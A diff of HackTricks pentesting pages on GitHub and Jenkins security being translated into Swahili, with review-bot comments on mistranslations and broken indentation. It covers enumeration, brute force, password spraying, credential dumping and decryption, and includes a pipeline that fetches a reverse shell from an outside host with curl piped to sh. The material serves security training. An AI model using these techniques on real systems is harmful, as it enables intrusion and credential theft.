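Review bot: the three YAML examples lose their indentation in the translated version (the `+` lines replacing `  - name: Hello world action` / `    with:` / `      super_secret:`, the Bash example, and the `jobs:` / `  deployment:` / `    runs-on:` block), which changes what the YAML means: `- name:`, `with:`, `env:` and `super_secret:` are now all at the same level as `steps:`, so the snippet no longer describes one step with an input and an environment variable, and `runs-on:` and `environment:` are no longer nested under `deployment:` inside `jobs:`. Restore the original leading spaces from the `-` lines (`steps:` then `  - name: Hello world action` then `    with: # Set the secret as an input`, and so on); while touching those lines, `super_secret:${{ secrets.SuperSecret }}` and `env: SUPER_SECRET:${{ ... }}` also need a space after the colon to be valid YAML mappings, which the original already got wrong. Several translated sentences also change their meaning: `kuunda mifumo yako mwenyewe` says "create your own systems" where "create your own roles" is meant (the same hunk uses `jukumu` for role two lines earlier); "configure" is rendered as `kuunda` (create) in `Unaweza kuunda akaunti yako na funguo` and `inawezekana kuunda **nani anahitaji idhini`, where `kusanidi` fits; and `ambazo zina matangazo yao` reads "that have their advertisements" rather than "that have them declared". The garbled emphasis `\_zote**\_\*\*` is copied over from the original line and could be cleaned up in the same pass. Finally, the trailing context lines `You can configure an environment to be **accessed** by **all branches** (default)` and `It can also set a **number of required reviews**` are still English, so this file is only partially translated.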
@@ -229,11 +223,11 @@ The **branch protections of a repository** can be found in _https://github.com/\
Different protections can be applied to a branch (like to master):
- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:
- - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
- - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
- - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
- - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
- - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
+- **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
+- **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
+- **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
+- **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
+- **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret).
- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
- **Require signed commits**. The commits need to be signed.
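Review bot: re-indenting the five sub-bullets (`- **Require a number of approvals**` through `- **Allow specified actors to bypass pull request requirements**`) removes their two-space nesting under `- You can **require a PR before merging**`, so options that the text itself says only apply once a PR is required ("If this is select different other protections can be in place") now render as top-level protections on the same level as `Require status checks to pass before merging` and `Require signed commits`. Restore the nesting; the change should be a no-op for the rendered page. Also note these lines stay in English while the surrounding file is translated to Swahili, so either translate them in this hunk or flag the file as partially translated.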
@@ -253,7 +247,3 @@ Different protections can be applied to a branch (like to master):
- [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md
index 4dfba3ff3..2fba38c54 100644
--- a/src/pentesting-ci-cd/jenkins-security/README.md
+++ b/src/pentesting-ci-cd/jenkins-security/README.md
@@ -4,7 +4,7 @@
## Basic Information
-Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
+Jenkins ni chombo kinachotoa njia rahisi ya kuanzisha **continuous integration** au **continuous delivery** (CI/CD) mazingira kwa karibu **yoyote** mchanganyiko wa **lugha za programu** na hifadhi za msimbo wa chanzo kwa kutumia pipelines. Aidha, inafanya kazi mbalimbali za kawaida za maendeleo kiotomatiki. Ingawa Jenkins haiondoi **hitaji la kuunda scripts kwa hatua binafsi**, inatoa njia ya haraka na yenye nguvu zaidi ya kuunganisha mfululizo mzima wa zana za kujenga, kujaribu, na kutekeleza kuliko mtu anavyoweza kujenga kwa urahisi kwa mikono.
{{#ref}}
basic-jenkins-information.md
@@ -12,74 +12,68 @@ basic-jenkins-information.md
## Unauthenticated Enumeration
-In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use:
-
+Ili kutafuta kurasa za Jenkins zinazovutia bila uthibitisho kama (_/people_ au _/asynchPeople_, hii inataja watumiaji wa sasa) unaweza kutumia:
```
msf> use auxiliary/scanner/http/jenkins_enum
```
-
-Check if you can execute commands without needing authentication:
-
+Angalia ikiwa unaweza kutekeleza amri bila kuhitaji uthibitisho:
```
msf> use auxiliary/scanner/http/jenkins_command
```
+Bila akreditivu unaweza kuangalia ndani ya _**/asynchPeople/**_ au _**/securityRealm/user/admin/search/index?q=**_ kwa **majina ya watumiaji**.
-Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**.
-
-You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_
+Unaweza kupata toleo la Jenkins kutoka kwenye njia _**/oops**_ au _**/error**_.
.png>)
-### Known Vulnerabilities
+### Uthibitisho wa Hatari
{{#ref}}
https://github.com/gquere/pwn_jenkins
{{#endref}}
-## Login
+## Ingia
-In the basic information you can check **all the ways to login inside Jenkins**:
+Katika taarifa za msingi unaweza kuangalia **njia zote za kuingia ndani ya Jenkins**:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
-### Register
+### Jisajili
-You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**
+Utakuwa na uwezo wa kupata mifano ya Jenkins ambazo **zinakuruhusu kuunda akaunti na kuingia ndani yake. Rahisi kama hiyo.**
-### **SSO Login**
+### **SSO Ingia**
-Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
+Pia ikiwa **SSO** **ufunctionality**/**plugins** zilikuwepo basi unapaswa kujaribu **kuingia** kwenye programu ukitumia akaunti ya majaribio (yaani, akaunti ya majaribio ya **Github/Bitbucket**). Njia kutoka [**hapa**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
### Bruteforce
-**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**.
-
+**Jenkins** haina **sera ya nywila** na **kuzuia brute-force ya majina ya watumiaji**. Ni muhimu **kujaribu brute-force** watumiaji kwani **nywila dhaifu** au **majina ya watumiaji kama nywila** yanaweza kutumika, hata **majina ya watumiaji yaliyogeuzwa kuwa nywila**.
```
msf> use auxiliary/scanner/http/jenkins_login
```
-
### Password spraying
-Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
+Tumia [hii script ya python](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) au [hii script ya powershell](https://github.com/chryzsh/JenkinsPasswordSpray).
### IP Whitelisting Bypass
-Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs.
+Mashirika mengi yanachanganya **mifumo ya usimamizi wa chanzo wa SaaS** kama GitHub au GitLab na **ufumbuzi wa CI wa ndani, uliojitegemea** kama Jenkins au TeamCity. Mpangilio huu unaruhusu mifumo ya CI **kupokea matukio ya webhook kutoka kwa wauzaji wa chanzo wa SaaS**, hasa kwa ajili ya kuanzisha kazi za pipeline.
-To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**.
+Ili kufanikisha hili, mashirika **yanapitia** **mipangilio ya IP** ya **mifumo ya SCM**, ikiruhusu kufikia **mfumo wa CI wa ndani** kupitia **webhooks**. Hata hivyo, ni muhimu kutambua kwamba **mtu yeyote** anaweza kuunda **akaunti** kwenye GitHub au GitLab na kuikamilisha ili **kuanzisha webhook**, ambayo inaweza kutuma maombi kwa **mfumo wa CI wa ndani**.
-Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
+Angalia: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
## Internal Jenkins Abuses
-In these scenarios we are going to suppose you have a valid account to access Jenkins.
+Katika hali hizi tutadhani una akaunti halali ya kufikia Jenkins.
> [!WARNING]
-> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
+> Kulingana na **mekanismu ya Uidhinishaji** iliyowekwa katika Jenkins na ruhusa ya mtumiaji aliyeathirika, **unaweza kuwa na uwezo au usiwe na uwezo wa kutekeleza mashambulizi yafuatayo.**
-For more information check the basic information:
+Kwa maelezo zaidi angalia taarifa za msingi:
{{#ref}}
basic-jenkins-information.md
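Review bot: `### Uthibitisho wa Hatari` does not translate "Known Vulnerabilities" (it reads roughly "verification of risk"); something like `### Udhaifu Unaojulikana` is meant, or keep the English heading as the hunk already does for `### Bruteforce`, `### Password spraying` and `### IP Whitelisting Bypass`, since translating only some headings (`## Ingia`, `### Jisajili`, `### **SSO Ingia**`) is inconsistent. The IP-whitelisting paragraph also loses its point: `mashirika **yanapitia** **mipangilio ya IP** ya **mifumo ya SCM**` says organisations "go through the IP settings" of the SCM platforms rather than whitelist their IP ranges (e.g. `yanaorodhesha safu za IP za mifumo ya SCM kama zinazoruhusiwa`), and `kuikamilisha` ("complete it") should be "configure it" (`kuisanidi`). Minor: `**ufunctionality**` is a half-translated "functionality" (`utendaji`), and `mifano ya Jenkins` means "examples of Jenkins" where "instances" is intended.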
@@ -87,165 +81,155 @@ basic-jenkins-information.md
### Listing users
-If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
+Ikiwa umefikia Jenkins unaweza orodhesha watumiaji wengine waliojiandikisha katika [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
### Dumping builds to find cleartext secrets
-Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
-
+Tumia [hii script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) kutupa matokeo ya console ya ujenzi na mabadiliko ya mazingira ya ujenzi ili kutumaini kupata siri za wazi.
```bash
python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v
```
+### **Kuhusisha Akiba za SSH**
-### **Stealing SSH Credentials**
-
-If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key:
+Ikiwa mtumiaji aliyeathirika ana **mamlaka ya kutosha kuunda/kubadilisha nodi mpya ya Jenkins** na akiba za SSH tayari zimehifadhiwa ili kufikia nodi nyingine, anaweza **kuhusisha akiba hizo** kwa kuunda/kubadilisha nodi na **kuweka mwenyeji ambaye atarekodi akiba hizo** bila kuthibitisha funguo za mwenyeji:
.png>)
-You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets).
+Kwa kawaida, utaweza kupata akiba za ssh za Jenkins katika **mtoa huduma wa kimataifa** (`/credentials/`), hivyo unaweza pia kuzitupa kama unavyotupa siri nyingine yoyote. Taarifa zaidi katika [**Sehemu ya Kutupa Siri**](./#dumping-secrets).
-### **RCE in Jenkins**
+### **RCE katika Jenkins**
-Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**.
+Kupata **shell katika seva ya Jenkins** inampa mshambuliaji fursa ya kuhusisha **siri** zote na **mabadiliko ya mazingira** na **kufanya kazi na mashine nyingine** zilizoko katika mtandao huo au hata **kusanya akiba za wingu**.
-By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**.
+Kwa kawaida, Jenkins itakuwa **ikifanya kazi kama SYSTEM**. Hivyo, kuathiriwa kwake kutampa mshambuliaji **mamlaka ya SYSTEM**.
-### **RCE Creating/Modifying a project**
+### **RCE Kuunda/Kubadilisha mradi**
-Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
+Kuunda/Kubadilisha mradi ni njia ya kupata RCE juu ya seva ya Jenkins:
{{#ref}}
jenkins-rce-creating-modifying-project.md
{{#endref}}
-### **RCE Execute Groovy script**
+### **RCE Kutekeleza script ya Groovy**
-You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project:
+Unaweza pia kupata RCE kwa kutekeleza script ya Groovy, ambayo inaweza kuwa ya siri zaidi kuliko kuunda mradi mpya:
{{#ref}}
jenkins-rce-with-groovy-script.md
{{#endref}}
-### RCE Creating/Modifying Pipeline
+### RCE Kuunda/Kubadilisha Pipeline
-You can also get **RCE by creating/modifying a pipeline**:
+Unaweza pia kupata **RCE kwa kuunda/kubadilisha pipeline**:
{{#ref}}
jenkins-rce-creating-modifying-pipeline.md
{{#endref}}
-## Pipeline Exploitation
+## Ukatili wa Pipeline
-To exploit pipelines you still need to have access to Jenkins.
+Ili kutumia pipelines bado unahitaji kuwa na ufikiaji wa Jenkins.
-### Build Pipelines
+### Kujenga Pipelines
-**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used:
+**Pipelines** zinaweza pia kutumika kama **mekanismu ya kujenga katika miradi**, katika kesi hiyo inaweza kuwekewa **faili ndani ya hazina** ambayo itakuwa na sintaksia ya pipeline. Kwa kawaida `/Jenkinsfile` inatumika:
.png>)
-It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
+Pia inawezekana **kuhifadhi faili za usanidi wa pipeline mahali pengine** (katika hazina nyingine kwa mfano) kwa lengo la **kutenganisha** ufikiaji wa hazina na ufikiaji wa pipeline.
-If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\
-It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not).
+Ikiwa mshambuliaji ana **ufikiaji wa kuandika juu ya faili hiyo** atakuwa na uwezo wa **kuyabadilisha** na **kuzindua** pipeline bila hata kuwa na ufikiaji wa Jenkins.\
+Inawezekana kwamba mshambuliaji atahitaji **kuzidi baadhi ya ulinzi wa tawi** (kulingana na jukwaa na mamlaka za mtumiaji wanaweza kuzidiwa au la).
-The most common triggers to execute a custom pipeline are:
+Vichocheo vya kawaida vya kutekeleza pipeline ya kawaida ni:
-- **Pull request** to the main branch (or potentially to other branches)
-- **Push to the main branch** (or potentially to other branches)
-- **Update the main branch** and wait until it's executed somehow
+- **Ombi la kuvuta** kwenye tawi kuu (au labda kwenye matawi mengine)
+- **Kusukuma kwenye tawi kuu** (au labda kwenye matawi mengine)
+- **Kusasisha tawi kuu** na kusubiri hadi itekelezwe kwa namna fulani
> [!NOTE]
-> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
+> Ikiwa wewe ni **mtumiaji wa nje** huwezi kutarajia kuunda **PR kwenye tawi kuu** la hazina ya **mtumiaji/taasisi nyingine** na **kuzindua pipeline**... lakini ikiwa ime **pangwa vibaya** unaweza kabisa **kuathiri kampuni kwa kutumia hili**.
-### Pipeline RCE
+### RCE ya Pipeline
-In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline).
+Katika sehemu ya awali ya RCE tayari ilionyeshwa mbinu ya [**kupata RCE kwa kubadilisha pipeline**](./#rce-creating-modifying-pipeline).
-### Checking Env variables
-
-It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles:
+### Kuangalia Mabadiliko ya Mazingira
+Inawezekana kutangaza **mabadiliko ya mazingira ya maandiko wazi** kwa pipeline nzima au kwa hatua maalum. Mabadiliko haya ya mazingira **hayapaswi kuwa na taarifa nyeti**, lakini mshambuliaji anaweza kila wakati **kuangalia usanidi wote wa pipeline**/Jenkinsfiles:
```bash
pipeline {
- agent {label 'built-in'}
- environment {
- GENERIC_ENV_VAR = "Test pipeline ENV variables."
- }
+agent {label 'built-in'}
+environment {
+GENERIC_ENV_VAR = "Test pipeline ENV variables."
+}
- stages {
- stage("Build") {
- environment {
- STAGE_ENV_VAR = "Test stage ENV variables."
- }
- steps {
+stages {
+stage("Build") {
+environment {
+STAGE_ENV_VAR = "Test stage ENV variables."
+}
+steps {
```
-
### Dumping secrets
-For information about how are secrets usually treated by Jenkins check out the basic information:
+Kwa maelezo kuhusu jinsi siri zinavyoshughulikiwa na Jenkins angalia taarifa za msingi:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
-Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job//configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines.
-
-There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**:
+Akreditivu zinaweza **kuwekwa kwa watoa huduma wa kimataifa** (`/credentials/`) au kwa **miradi maalum** (`/job//configure`). Hivyo, ili kuhamasisha zote unahitaji **kuathiri angalau miradi yote** ambayo ina siri na kutekeleza pipelines za kawaida/za sumu.
+Kuna tatizo lingine, ili kupata **siri ndani ya env** ya pipeline unahitaji **kujua jina na aina ya siri**. Kwa mfano, unajaribu **kuchaji** **`usernamePassword`** **siri** kama **`string`** **siri** utapata **kosa** hili:
```
ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected
```
-
-Here you have the way to load some common secret types:
-
+Hapa kuna njia ya kupakia aina kadhaa za siri za kawaida:
```bash
withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
- sh '''
- env #Search for USERNAME and PASS
- '''
+sh '''
+env #Search for USERNAME and PASS
+'''
}
withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
- sh '''
- env #Search for SECRET
- '''
+sh '''
+env #Search for SECRET
+'''
}
withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
- sh '''
- env # Search for USERPASS
- '''
+sh '''
+env # Search for USERPASS
+'''
}
# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
- string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
- sh '''
- env
- '''
+string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+sh '''
+env
+'''
}
```
-
-At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
+Katika mwisho wa ukurasa huu unaweza **kupata aina zote za akreditivu**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
> [!WARNING]
-> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
-> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
+> Njia bora ya **kutoa siri zote kwa wakati mmoja** ni kwa **kuathiri** mashine ya **Jenkins** (kufanya kazi na shell ya nyuma katika **node iliyo ndani** kwa mfano) na kisha **kuvuja** **funguo za mkuu** na **siri zilizofichwa** na kuzifungua bila mtandao.\
+> Zaidi kuhusu jinsi ya kufanya hivi katika [sehemu ya Nodes & Agents](./#nodes-and-agents) na katika [sehemu ya Post Exploitation](./#post-exploitation).
### Triggers
-From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`.
-
-Cron example:
+Kutoka [nyaraka](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): Mwelekeo wa `triggers` unafafanua **njia za kiotomatiki ambazo Pipeline inapaswa kuanzishwa tena**. Kwa Pipelines ambazo zimeunganishwa na chanzo kama GitHub au BitBucket, `triggers` huenda zisihitajike kwani uunganisho wa msingi wa webhooks tayari utakuwepo. Triggers zinazopatikana kwa sasa ni `cron`, `pollSCM` na `upstream`.
+Mfano wa Cron:
```bash
triggers { cron('H */4 * * 1-5') }
```
-
Check **other examples in the docs**.
### Nodes & Agents
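Review bot: the in-page anchors in this hunk will break once the headings they target are translated: `[**kupata RCE kwa kubadilisha pipeline**](./#rce-creating-modifying-pipeline)` points at a heading that the same hunk renames to `### RCE Kuunda/Kubadilisha Pipeline`, and the warning box links `./#post-exploitation` while a later hunk renames that section to `## Baada ya Kutekeleza` (only `./#nodes-and-agents` still resolves, because `### Nodes & Agents` is left in English). Either keep the English heading text, add explicit ids if the book renderer supports them, or update the links to the new generated slugs in the same change. Several renderings also change meaning: `## Ukatili wa Pipeline` reads as "pipeline cruelty" (Unyonyaji or Utumiaji mbaya wa Pipeline), `### Kuangalia Mabadiliko ya Mazingira` turns env *variables* into environmental *changes* (vigezo vya mazingira), `kuchaji` means "to charge" rather than "to load" (kupakia), `kuhamasisha zote` means "mobilise them all" rather than exfiltrate (kutoa nje / kuvuja), and `ime **pangwa vibaya**` splits one word across the bold markers (imepangwa vibaya). The Groovy snippets lose all indentation when the `-` lines are re-emitted as `+` lines (`agent {label 'built-in'}` and the nested `stage`/`environment`/`steps` blocks are now flush-left); translation should not touch fenced code, so keep those blocks byte-identical to the source. Lastly `Check **other examples in the docs**.` is the one prose line left untranslated in this hunk.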
@@ -265,48 +249,44 @@ You can enumerate the **configured nodes** in `/computer/`, you will usually fin
It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config:
-
```bash
pipeline {
- agent {label 'built-in'}
+agent {label 'built-in'}
```
+### Mfano kamili
-### Complete example
-
-Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:
-
+Pipeline katika wakala maalum, na kichocheo cha cron, na pipeline na hatua za mazingira, ikipakia mabadiliko 2 katika hatua na kutuma shell ya kinyume:
```bash
pipeline {
- agent {label 'built-in'}
- triggers { cron('H */4 * * 1-5') }
- environment {
- GENERIC_ENV_VAR = "Test pipeline ENV variables."
- }
+agent {label 'built-in'}
+triggers { cron('H */4 * * 1-5') }
+environment {
+GENERIC_ENV_VAR = "Test pipeline ENV variables."
+}
- stages {
- stage("Build") {
- environment {
- STAGE_ENV_VAR = "Test stage ENV variables."
- }
- steps {
- withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
- string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
- sh '''
- curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
- '''
- }
- }
- }
+stages {
+stage("Build") {
+environment {
+STAGE_ENV_VAR = "Test stage ENV variables."
+}
+steps {
+withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
+string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+sh '''
+curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
+'''
+}
+}
+}
- post {
- always {
- cleanWs()
- }
- }
+post {
+always {
+cleanWs()
+}
+}
}
```
-
-## Arbitrary File Read to RCE
+## Kusoma Faili Bila Mpangilio hadi RCE
{{#ref}}
jenkins-arbitrary-file-read-to-rce-via-remember-me.md
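Review bot: `## Kusoma Faili Bila Mpangilio hadi RCE` renders "arbitrary" as "without order / at random"; the linked technique reads any file the attacker chooses, so "Usomaji wa Faili Yoyote hadi RCE" (or the English term the linked page keeps) is what is meant. The lead-in `na pipeline na hatua za mazingira` garbles "with pipeline and stage env variables" (vigezo vya mazingira vya pipeline na vya hatua). As in the previous hunk, the complete Jenkinsfile is re-emitted flush-left, so the nesting of `stages` / `stage("Build")` / `withCredentials` and the `post { always { cleanWs() } }` block is no longer visible; restore the original indentation inside the fence. The moved heading `### Mfano kamili` also lands before the blank line that used to separate it from the preceding fence, so it should be followed by a blank line as the other headings in the file are.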
@@ -326,19 +306,17 @@ jenkins-rce-creating-modifying-project.md
jenkins-rce-creating-modifying-pipeline.md
{{#endref}}
-## Post Exploitation
+## Baada ya Kutekeleza
### Metasploit
-
```
msf> post/multi/gather/jenkins_gather
```
-
### Jenkins Secrets
-You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
+Unaweza kuorodhesha siri kwa kufikia `/credentials/` ikiwa una ruhusa za kutosha. Kumbuka kwamba hii itataja tu siri zilizo ndani ya faili `credentials.xml`, lakini **faili za usanidi wa ujenzi** zinaweza pia kuwa na **siri zaidi**.
-If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**.
+Ikiwa unaweza **kuona usanidi wa kila mradi**, unaweza pia kuona huko **majina ya siri (credentials)** yanayotumika kufikia hifadhi na **siri nyingine za mradi**.
.png>)
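Review bot: `## Baada ya Kutekeleza` means "after executing / after implementing", not post-exploitation, and an earlier warning box in this file still links to this section as `./#post-exploitation`; keep `## Post Exploitation`, or use a rendering such as "Baada ya Unyonyaji" and update that link in the same change. The `.png>)` fragment closing the hunk is a broken image reference that predates this diff; since the surrounding lines are being rewritten anyway, restore the full image markup rather than carrying the fragment into the translated file.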
@@ -350,19 +328,18 @@ jenkins-dumping-secrets-from-groovy.md
#### From disk
-These files are needed to **decrypt Jenkins secrets**:
+Faili hizi zinahitajika ili **kufichua siri za Jenkins**:
- secrets/master.key
- secrets/hudson.util.Secret
-Such **secrets can usually be found in**:
+Siri hizo **kwa kawaida zinaweza kupatikana katika**:
- credentials.xml
- jobs/.../build.xml
- jobs/.../config.xml
-Here's a regex to find them:
-
+Hapa kuna regex ya kuzipata:
```bash
# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
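Review bot: `Faili hizi zinahitajika ili **kufichua siri za Jenkins**` says "to reveal / expose", but the sentence is about decrypting the stored values with `secrets/master.key` and `secrets/hudson.util.Secret`; "kusimbua" (decrypt) keeps the cryptographic meaning, and the same term should then be reused for the `Decrypt Jenkins secrets offline` and `from Groovy` headings so the three steps read as one procedure.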
@@ -372,11 +349,9 @@ grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Secret example
credentials.xml: {AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}
```
-
#### Decrypt Jenkins secrets offline
-If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**.
-
+Ikiwa umepata **neno la siri zinazohitajika kufungua siri hizo**, tumia [**hii script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **kufungua siri hizo**.
```bash
python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
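Review bot: `Ikiwa umepata **neno la siri zinazohitajika kufungua siri hizo**` is grammatically inconsistent (singular `neno` with the plural agreement `zinazohitajika`) and, like the English it translates, calls the inputs "passwords" although the command on the next line consumes key files: `python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml`. Say "funguo zinazohitajika" (the required keys, i.e. `master.key` and `hudson.util.Secret`) and "kusimbua" for decrypt so the sentence matches the command it introduces.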
@@ -384,23 +359,20 @@ python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT
```
-
